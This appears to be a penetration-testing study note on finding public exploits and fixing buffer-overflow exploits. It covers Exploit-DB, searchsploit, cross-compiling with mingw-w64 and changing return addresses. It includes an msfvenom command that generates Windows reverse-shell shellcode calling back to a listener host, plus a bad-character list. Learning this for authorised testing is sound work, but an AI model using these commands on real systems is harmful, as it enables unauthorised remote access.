Skip to content

Locating and Fixing Public Exploits

,Online Exploit resources Exploit Database aka exploit DB - https://www.exploit-db.com/ D column is download A lists vulnerable application files of exploit which we can download for research and testing V marks whether the exploit has been verified Type designates the exploit as dos, local, remote, or webapp Platform designates the system affected by the exploit. This can be operating systems, hardware or code language services (php) Packet Storm - https://packetstormsecurity.com/ Github We can also use google dorking to try and locate specific exploits

OffSec has a GitHub account where we can find different repositories like exploitdb-bin-sploits, which contains pre-compiled exploits for easy execution.

Offline resources metasploit framework Core Impact - paid for Canvas - paid for Browser Exploitation Framework (BeEF) - pentest tool focused on client side attacks from a web browser

Searchsploit command to update: sudo apt update && sudo apt install exploitdb

nmap scripts located under /usr/share/nmap/scripts We can get more info for scripts by running nmap with the --script-help flag

nmap --script-help=clamav-exec.nse

Fixing Public Exploits

Fixing memory corruption exploits

Memory corruption exploits, such as buffer overflows, are relatively complex and can be difficult to modify.

Buffer Overflow Theory

In General, buffer is a memory area intended to hold content that is often sent by the user. SOme buffers have a dynamic size, but some are fixed or preallocated. Buffer overflows can occur either on the heap or the stack. The heap is dynamically managed and typically stores large chunks of globally-accessible data. The stack's function is to store local functions' data. If an attacker can overwrite the return address located after the buffer, they can control the next code to execute An attacker will overwrite the return address to shellcode to a valid mapped memory address.

General flow of Buffer Overflow attacks 1. Create a large buffer to trigger the overflow 2. Take control of EIP by overwriting a return on the stack, padding the large buffer with the appropriate offset 3. Include a chosen payload in the buffer prepended by an optional NOP sled 4. Choose a correct return address instruction such as JMP ESP to redirect the execution flow payload

We may need to modify file paths, IP addresses, ports, URLs, and more. If these modifications alter our offset, we need to adjust the buffer length

If we get an exploit with windows headers we may need to cross compile using Kali linux

We can use mingw-w64 cross compiler. Install using

sudo apt install mingw-w64

Then we can cross compile an executable using the command

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe

Sometimes there will be errors with cross compiling. In the case of this exploit there are errors for undefined functions. After googling the first one it appears the functions missing are found in winsock.h we can add the -lws2_32 parameter to resolve this issue.

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32

With the "-" option while compling we can instruct mingw-w64 to search for any missing DLL and include it in final execution.

Don't forget to update any hard coded IP and port values

Changing shellcode

Sometimes we will need to change the shellcode of a buffer overflow. It may have invalid characters, or need to update the payload

Bad characters: "\x00\x0a\x0d\x25\x26\x2b\x3d"

We can generate new shellcode using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Changing the return address

Sometimes we will need to change the return address of an exploit. For example, if the address of a jump ESP instruction points to a library that is not present, we need to find a new address. We can reference other versions of the exploit, if there are multiple exploits available. If this isn't available, we have a few options. We can create a sandbox environment and test/find a new address --> this is not the best option because ASLR now randomizes memory addresses of DLLs in Windows.

Fixing Web Exploits